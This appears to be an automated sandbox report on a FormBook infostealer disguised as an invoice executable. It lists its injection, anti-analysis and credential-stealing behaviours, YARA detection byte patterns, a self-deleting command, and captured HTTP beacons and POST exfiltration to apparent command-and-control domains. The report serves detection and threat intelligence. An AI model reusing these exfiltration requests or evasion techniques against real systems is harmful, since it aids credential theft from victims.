Loading ...

Play interactive tourEdit tour

Analysis Report Invoice_CAII00008052.exe

Overview

General Information

Sample Name:Invoice_CAII00008052.exe
MD5:2178b027d2a8569ae99bd44a95098752
SHA1:028e676861237538ca07c9c5af22f00f75ffa842
SHA256:bbeaa9844707d05be207be543f9adaf70878e8e7d36eae9fe73fc8e9b92b3a72

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Found API chain indicative of debugger detection
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • Invoice_CAII00008052.exe (PID: 5564 cmdline: 'C:\Users\user\Desktop\Invoice_CAII00008052.exe' MD5: 2178B027D2A8569AE99BD44A95098752)
    • Invoice_CAII00008052.exe (PID: 5688 cmdline: 'C:\Users\user\Desktop\Invoice_CAII00008052.exe' MD5: 2178B027D2A8569AE99BD44A95098752)
      • explorer.exe (PID: 3024 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • autofmt.exe (PID: 5984 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 799DAC47499E80129D45A4818CF75657)
        • autochk.exe (PID: 5992 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 67DFCAFAAD1B556C7731CDFDD4F4B803)
        • WWAHost.exe (PID: 6024 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: C9270A9CEE330E944B6CA1212D6B77DA)
          • cmd.exe (PID: 6052 cmdline: /c del 'C:\Users\user\Desktop\Invoice_CAII00008052.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16289:$sqlite3step: 68 34 1C 7B E1
    • 0x1639c:$sqlite3step: 68 34 1C 7B E1
    • 0x162b8:$sqlite3text: 68 38 2A 90 C5
    • 0x163dd:$sqlite3text: 68 38 2A 90 C5
    • 0x162cb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x163f3:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8358:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x86f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14385:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13e71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14487:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x145ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x927a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x130ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ff2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.420143048.00000000022E0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.420143048.00000000022E0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x16289:$sqlite3step: 68 34 1C 7B E1
      • 0x1639c:$sqlite3step: 68 34 1C 7B E1
      • 0x162b8:$sqlite3text: 68 38 2A 90 C5
      • 0x163dd:$sqlite3text: 68 38 2A 90 C5
      • 0x162cb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x163f3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.Invoice_CAII00008052.exe.27f0000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.Invoice_CAII00008052.exe.27f0000.3.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15489:$sqlite3step: 68 34 1C 7B E1
        • 0x1559c:$sqlite3step: 68 34 1C 7B E1
        • 0x154b8:$sqlite3text: 68 38 2A 90 C5
        • 0x155dd:$sqlite3text: 68 38 2A 90 C5
        • 0x154cb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x155f3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Invoice_CAII00008052.exe.27f0000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7558:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x78f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13585:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13071:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13687:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x137ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x847a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x122ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x91f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x17b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x18bea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.1.Invoice_CAII00008052.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.1.Invoice_CAII00008052.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x16289:$sqlite3step: 68 34 1C 7B E1
          • 0x1639c:$sqlite3step: 68 34 1C 7B E1
          • 0x162b8:$sqlite3text: 68 38 2A 90 C5
          • 0x163dd:$sqlite3text: 68 38 2A 90 C5
          • 0x162cb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x163f3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 19 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.831246540.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.420143048.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.477326114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.417991143.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.478240526.0000000000960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.478536587.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.828174858.0000000000450000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.421053074.00000000027F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Invoice_CAII00008052.exe.27f0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Invoice_CAII00008052.exe.22e0000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Invoice_CAII00008052.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Invoice_CAII00008052.exe.22e0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Invoice_CAII00008052.exe.27f0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Invoice_CAII00008052.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Invoice_CAII00008052.exeJoe Sandbox ML: detected
          Source: 0.2.Invoice_CAII00008052.exe.27f0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.Invoice_CAII00008052.exe.22e0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.1.Invoice_CAII00008052.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.Invoice_CAII00008052.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_00409044 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_00409044
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 0_2_00405A68 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00405A68
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_02D9F760 FindFirstFileW,FindNextFileW,FindClose,8_2_02D9F760
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 8_2_02D9F759 FindFirstFileW,FindNextFileW,FindClose,8_2_02D9F759

          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 4x nop then push 00491B28h0_2_00491A08
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 4x nop then call 00406A90h0_2_00491B7C
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 4x nop then push 004A0DDCh0_2_00491B7C
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 4x nop then pop edi2_2_0040C1B6
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 4x nop then pop edi2_2_0040C20F
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 4x nop then pop edi2_1_0040C1B6
          Source: C:\Users\user\Desktop\Invoice_CAII00008052.exeCode function: 4x nop then pop edi2_1_0040C20F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi8_2_02D9C20F
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 4x nop then pop edi8_2_02D9C1B6

          Source: global trafficHTTP traffic detected: GET /an0m/?abN8C=Y8StOgjTBUc2RVi6CYGlo0NtpMFpwQziuZFViwsCv7eH1Z9qFtHxKm+jrwjT9KknvY5b&JZ_Pc=6lLxrhzpOFuTS42 HTTP/1.1Host: www.yr-ct.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /an0m/?JZ_Pc=6lLxrhzpOFuTS42&abN8C=w0B5E3Tvv+w/kd6Kt5bRc+mL8evPET7jJX5z0mytnSYVGaemefvLsJvEtAuh1jmwBHT3 HTTP/1.1Host: www.magentos.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /an0m/?JZ_Pc=6lLxrhzpOFuTS42&abN8C=ItsweDGFEIfkN8iGMiT/CcI9tOGzcRma3szN3awFj2f289L7MYRfsokf4asOwmhwfWcg HTTP/1.1Host: www.aj-buckley.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /an0m/?abN8C=kOFDBNZQA2sT84b4nGvJlEsnJlkbfDKocHJFzldP3EC4MwSwQZ17LsPPvOWyctfqTmcO&JZ_Pc=6lLxrhzpOFuTS42 HTTP/1.1Host: www.mommietalk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
          Source: Joe Sandbox ViewIP Address: 160.153.136.3 160.153.136.3
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: Joe Sandbox ViewASN Name: unknown unknown
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.magentos.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.magentos.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.magentos.info/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 28 32 31 44 61 53 4b 39 69 65 31 5a 35 39 4c 61 36 38 43 74 47 61 4f 36 37 62 4b 54 48 78 72 45 56 48 6b 6c 6b 56 79 4b 73 58 59 42 41 4b 79 65 55 50 58 54 75 35 57 63 70 68 32 6d 31 51 65 45 49 69 7a 34 71 32 45 56 72 4f 6f 47 71 6d 4f 64 58 53 5a 79 44 38 52 44 43 71 4d 37 77 68 58 76 35 72 4f 72 54 30 72 36 6c 53 69 2d 61 39 68 46 66 37 6a 61 31 57 31 61 4a 62 70 31 7e 45 65 54 62 42 6b 33 38 66 5a 6b 33 71 49 38 48 59 33 49 4f 74 38 57 62 37 75 31 73 4d 4f 54 55 52 4d 30 41 59 70 67 72 34 56 32 45 73 51 6f 58 59 72 41 42 6e 65 76 42 34 28 6d 51 33 58 67 42 67 6f 2d 4b 77 4f 75 4a 63 28 52 58 53 42 64 35 31 6d 42 67 64 76 53 58 47 35 5a 69 57 44 63 5a 63 30 49 28 48 59 6e 67 71 52 63 4a 4d 73 32 6a 6e 65 57 4f 37 52 31 55 4b 49 57 64 50 77 32 28 4f 32 61 63 41 62 59 48 47 39 44 75 4f 57 4d 6a 33 52 49 35 4b 46 6f 6d 49 55 57 50 30 43 64 71 41 4c 49 67 52 4b 35 6b 2d 31 30 28 55 4a 50 43 70 6b 68 31 41 78 5a 79 66 70 30 78 30 6b 64 32 6d 42 72 41 42 64 77 4e 6c 55 52 48 2d 61 7a 53 53 37 73 73 30 45 31 36 76 76 72 55 4b 5a 53 50 55 42 66 54 50 7e 6a 45 75 33 39 35 59 49 7a 6e 59 59 55 64 7a 79 5f 5a 37 68 77 32 75 68 62 6f 39 69 4e 36 72 69 35 6a 72 52 47 36 36 44 6e 64 6a 74 2d 43 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: abN8C=(21DaSK9ie1Z59La68CtGaO67bKTHxrEVHklkVyKsXYBAKyeUPXTu5Wcph2m1QeEIiz4q2EVrOoGqmOdXSZyD8RDCqM7whXv5rOrT0r6lSi-a9hFf7ja1W1aJbp1~EeTbBk38fZk3qI8HY3IOt8Wb7u1sMOTURM0AYpgr4V2EsQoXYrABnevB4(mQ3XgBgo-KwOuJc(RXSBd51mBgdvSXG5ZiWDcZc0I(HYngqRcJMs2jneWO7R1UKIWdPw2(O2acAbYHG9DuOWMj3RI5KFomIUWP0CdqALIgRK5k-10(UJPCpkh1AxZyfp0x0kd2mBrABdwNlURH-azSS7ss0E16vvrUKZSPUBfTP~jEu395YIznYYUdzy_Z7hw2uhbo9iN6ri5jrRG66Dndjt-Cg).
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.aj-buckley.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.aj-buckley.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.aj-buckley.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 48 76 59 4b 41 6d 7e 46 4e 59 7e 45 4d 74 28 41 52 57 53 76 65 72 6c 48 37 37 79 7a 58 41 28 51 73 61 53 46 6a 4d 45 79 68 55 54 4d 35 4e 62 69 4c 49 64 4e 6d 5a 64 78 34 6f 73 4e 34 31 63 67 58 57 63 34 50 54 68 7a 53 75 35 4b 72 76 41 6a 46 37 62 39 28 54 45 42 74 46 6a 73 6c 42 39 49 54 68 49 72 61 68 71 2d 67 2d 46 35 46 6f 6e 67 42 45 49 2d 4a 6b 49 38 79 55 54 63 54 63 6e 49 47 44 7e 41 36 38 34 4d 65 52 69 79 36 42 42 56 78 58 62 62 31 61 74 7a 67 63 4f 63 36 4f 76 63 48 4e 69 64 6f 73 48 4c 70 59 57 4f 63 69 75 7a 76 4c 4f 51 36 41 34 72 4d 6a 30 42 32 64 5a 4e 65 31 74 74 56 36 45 62 64 77 59 70 32 39 42 65 31 42 76 45 39 6d 77 31 46 42 61 55 76 71 62 64 6b 5f 47 66 6d 4e 66 4c 69 4e 41 46 48 38 6b 66 36 6d 5a 32 37 69 44 35 37 4f 6c 57 73 6f 36 36 35 4f 51 4e 51 66 4f 38 4a 6a 6e 75 53 61 68 69 7e 76 73 4b 63 6a 67 58 6f 49 34 6b 79 68 4f 2d 50 32 66 43 39 42 72 72 48 63 38 4a 33 6d 43 72 46 71 74 54 6f 48 66 45 78 44 69 74 6b 31 4d 66 47 69 59 30 39 32 39 32 64 4c 53 36 32 75 35 4c 6b 35 56 74 69 2d 6e 79 75 52 37 6a 55 6b 56 6c 67 5f 7a 37 6f 6d 4a 57 55 7a 43 41 68 54 75 77 6c 35 46 4e 54 4f 69 76 34 76 6a 56 76 4e 64 6c 79 30 6b 39 6b 6a 38 75 4a 46 75 5a 5a 64 66 74 66 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: abN8C=HvYKAm~FNY~EMt(ARWSverlH77yzXA(QsaSFjMEyhUTM5NbiLIdNmZdx4osN41cgXWc4PThzSu5KrvAjF7b9(TEBtFjslB9IThIrahq-g-F5FongBEI-JkI8yUTcTcnIGD~A684MeRiy6BBVxXbb1atzgcOc6OvcHNidosHLpYWOciuzvLOQ6A4rMj0B2dZNe1ttV6EbdwYp29Be1BvE9mw1FBaUvqbdk_GfmNfLiNAFH8kf6mZ27iD57OlWso665OQNQfO8JjnuSahi~vsKcjgXoI4kyhO-P2fC9BrrHc8J3mCrFqtToHfExDitk1MfGiY09292dLS62u5Lk5Vti-nyuR7jUkVlg_z7omJWUzCAhTuwl5FNTOiv4vjVvNdly0k9kj8uJFuZZdftfA).
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.mommietalk.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.mommietalk.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mommietalk.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 72 4d 78 35 66 70 51 45 63 68 74 79 38 49 79 6c 35 77 7e 70 6c 51 6c 47 48 33 31 4e 66 79 69 58 49 41 49 6a 6d 58 42 62 79 31 47 50 4f 6a 4b 37 66 38 67 57 4e 38 4b 57 31 39 7e 6c 5a 5f 4f 38 57 43 6c 54 51 67 33 48 47 69 7e 62 68 65 38 45 57 76 41 44 4f 50 37 7a 77 34 63 36 4b 4b 50 67 30 53 42 45 61 46 6b 69 51 59 64 6a 58 4d 74 50 4d 4b 6c 54 32 33 62 41 48 4a 4f 78 6a 35 72 32 42 6a 57 5a 73 56 41 72 58 76 52 47 48 31 54 69 5a 31 28 66 28 54 72 42 78 68 43 6b 6e 69 4c 62 6f 41 7e 59 45 62 35 30 34 39 32 34 54 4a 48 44 4f 33 65 4f 34 63 69 67 44 43 68 5a 35 43 44 45 30 51 34 76 37 35 34 56 50 32 36 62 51 6b 71 6a 57 4a 7a 6b 61 55 75 38 41 4d 78 50 66 36 54 59 79 69 44 45 6c 42 4d 64 48 48 6f 49 6f 4b 33 30 57 32 75 4c 6e 4c 38 58 7e 76 38 78 64 63 33 58 7e 45 75 4a 61 55 48 36 32 6c 30 4e 4f 39 70 4b 51 31 75 30 57 38 4b 73 46 6e 54 55 66 57 78 52 7a 2d 35 52 7a 6b 57 31 76 36 43 39 56 33 4e 45 71 4b 4b 48 6d 76 34 78 37 35 68 58 56 4e 45 43 6b 4e 77 4c 30 31 51 30 35 4a 4b 4a 68 53 50 34 61 45 59 55 46 73 28 70 68 59 35 6a 71 65 4c 54 56 6b 79 39 66 44 42 46 4f 67 6d 73 71 52 31 37 63 5a 61 57 6c 2d 61 78 42 47 71 6b 6c 6c 6f 5a 44 69 4f 4f 30 6c 54 5f 72 4e 4c 2d 30 4a 76 5f 4f 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: abN8C=rMx5fpQEchty8Iyl5w~plQlGH31NfyiXIAIjmXBby1GPOjK7f8gWN8KW19~lZ_O8WClTQg3HGi~bhe8EWvADOP7zw4c6KKPg0SBEaFkiQYdjXMtPMKlT23bAHJOxj5r2BjWZsVArXvRGH1TiZ1(f(TrBxhCkniLboA~YEb504924TJHDO3eO4cigDChZ5CDE0Q4v754VP26bQkqjWJzkaUu8AMxPf6TYyiDElBMdHHoIoK30W2uLnL8X~v8xdc3X~EuJaUH62l0NO9pKQ1u0W8KsFnTUfWxRz-5RzkW1v6C9V3NEqKKHmv4x75hXVNECkNwL01Q05JKJhSP4aEYUFs(phY5jqeLTVky9fDBFOgmsqR17cZaWl-axBGqklloZDiOO0lT_rNL-0Jv_Og).
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.betterhipaablueprint.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.betterhipaablueprint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.betterhipaablueprint.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 36 5f 69 43 66 50 59 77 6d 55 47 63 38 38 73 73 6a 37 34 4d 33 74 66 6e 48 47 67 42 35 33 67 65 68 77 76 4a 6a 49 78 79 6f 2d 4f 6b 48 44 71 32 45 5f 4e 68 6f 63 58 62 31 74 65 70 39 52 44 77 58 50 6e 43 57 44 43 74 39 6d 70 56 30 45 6e 41 56 56 73 2d 69 73 76 47 28 5f 41 75 4b 6f 54 53 7a 31 70 56 55 7a 62 42 65 59 52 54 33 78 62 39 35 4a 6a 4d 4a 78 4f 59 59 36 4d 34 67 71 6b 63 55 62 33 43 33 45 45 56 67 4f 54 6c 38 5a 45 4a 6b 4e 6d 62 38 45 67 4b 48 72 6d 45 6d 38 30 35 4c 6f 6d 4a 66 59 32 6f 7a 70 71 4a 75 37 59 49 70 2d 79 75 6c 6c 44 58 4a 45 42 35 4d 74 5a 2d 42 78 47 31 68 46 64 62 54 6b 46 6c 32 65 77 6e 7e 4e 66 57 55 68 49 31 74 30 51 4a 6f 78 4a 42 43 6e 7a 6b 6b 71 4b 66 71 45 37 6a 32 54 34 70 52 35 37 47 73 37 74 33 56 32 34 31 36 45 51 4c 47 56 6e 62 70 59 4b 6a 55 50 65 35 46 52 56 34 56 56 7e 4e 43 39 75 31 59 6a 28 41 6d 36 74 32 63 6a 42 61 50 59 7e 38 44 44 73 6e 75 64 28 4e 54 76 56 30 4a 48 75 68 30 79 54 34 28 53 34 32 71 6b 70 56 4f 74 32 47 5a 35 56 4b 74 4a 4b 5a 70 75 4b 67 5a 73 52 31 73 58 69 67 75 6d 39 55 41 79 50 54 35 64 6e 64 72 32 44 47 57 67 68 6f 30 58 6e 72 57 67 51 78 79 2d 36 73 6c 2d 31 68 41 35 67 53 56 62 46 6b 39 4a 64 54 78 62 30 78 33 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: abN8C=6_iCfPYwmUGc88ssj74M3tfnHGgB53gehwvJjIxyo-OkHDq2E_NhocXb1tep9RDwXPnCWDCt9mpV0EnAVVs-isvG(_AuKoTSz1pVUzbBeYRT3xb95JjMJxOYY6M4gqkcUb3C3EEVgOTl8ZEJkNmb8EgKHrmEm805LomJfY2ozpqJu7YIp-yullDXJEB5MtZ-BxG1hFdbTkFl2ewn~NfWUhI1t0QJoxJBCnzkkqKfqE7j2T4pR57Gs7t3V2416EQLGVnbpYKjUPe5FRV4VV~NC9u1Yj(Am6t2cjBaPY~8DDsnud(NTvV0JHuh0yT4(S42qkpVOt2GZ5VKtJKZpuKgZsR1sXigum9UAyPT5dndr2DGWgho0XnrWgQxy-6sl-1hA5gSVbFk9JdTxb0x3A).
          Source: global trafficHTTP traffic detected: POST /an0m/ HTTP/1.1Host: www.betterhipaablueprint.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.betterhipaablueprint.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.betterhipaablueprint.com/an0m/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 61 62 4e 38 43 3d 36 5f 69 43 66 50 59 77 6d 55 47 63 38 38 73 73 6a 37 34 4d 33 74 66 6e 48 47 67 42 35 33 67 65 68 77 76 4a 6a 49 78 79 6f 2d 4f 6b 48 44 71 32 45 5f 4e 68 6f 63 58 62 31 74 65 70 39 52 44 77 58 50 6e 43 57 44 43 74 39 6d 70 56 30 45 6e 41 56 56 73 2d 69 73 76 47 28 5f 41 75 4b 6f 54 53 7a 31 70 56 55 7a 62 42 65 59 52 54 33 78 62 39 35 4a 6a 4d 4a 78 4f 59 59 36 4d 34 67 71 6b 63 55 62 33 43 33 45 45 56 67 4f 54 6c 38 5a 45 4a 6b 4e 6d 62 38 45 67 4b 48 72 6d 45 6d 38 30 35 4c 6f 6d 4a 66 59 32 6f 7a 70 71 4a 75 37 59 49 70 2d 79 75 6c 6c 44 58 4a 45 42 35 4d 74 5a 2d 42 78 47 31 68 46 64 62 54 6b 46 6c 32 65 77 6e 7e 4e 66 57 55 68 49 31 74 30 51 4a 6f 78 4a 42 43 6e 7a 6b 6b 71 4b 66 71 45 37 6a 32 54 34 70 52 35 37 47 73 37 74 33 56 32 34 31 36 45 51 4c 47 56 6e 62 70 59 4b 6a 55 50 65 35 46 52 56 34 56 56 7e 4e 43 39 75 31 59 6a 28 41 6d 36 74 32 63 6a 42 61 50 59 7e 38 44 44 73 6e 75 64 28 4e 54 76 56 30 4a 48 75 68 30 79 54 34 28 53 34 32 71 6b 70 56 4f 74 32 47 5a 35 56 4b 74 4a 4b 5a 70 75 4b 67 5a 73 52 31 73 58 69 67 75 6d 39 55 41 79 50 54 35 64 6e 64 72 32 44 47 57 67 68 6f 30 58 6e 72 57 67 51 78 79 2d 36 73 6c 2d 31 68 41 35 67 53 56 62 46 6b 39 4a 64 54 78 62 30 78 33 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: abN8C=6_iCfPYwmUGc88ssj74M3tfnHGgB53gehwvJjIxyo-OkHDq2E_NhocXb1tep9RDwXPnCWDCt9mpV0EnAVVs-isvG(_AuKoTSz1pVUzbBeYRT3xb95JjMJxOYY6M4gqkcUb3C3EEVgOTl8ZEJkNmb8EgKHrmEm805LomJfY2ozpqJu7YIp-yullDXJEB5MtZ-BxG1hFdbTkFl2ewn~NfWUhI1t0QJoxJBCnzkkqKfqE7j2T4pR57Gs7t3V2416EQLGVnbpYKjUPe5FRV4VV~NC9u1Yj(Am6t2cjBaPY~8DDsnud(NTvV0JHuh0yT4(S42qkpVOt2GZ5VKtJKZpuKgZsR1sXigum9UAyPT5dndr2DGWgho0XnrWgQxy-6sl-1hA5gSVbFk9JdTxb0x3A).
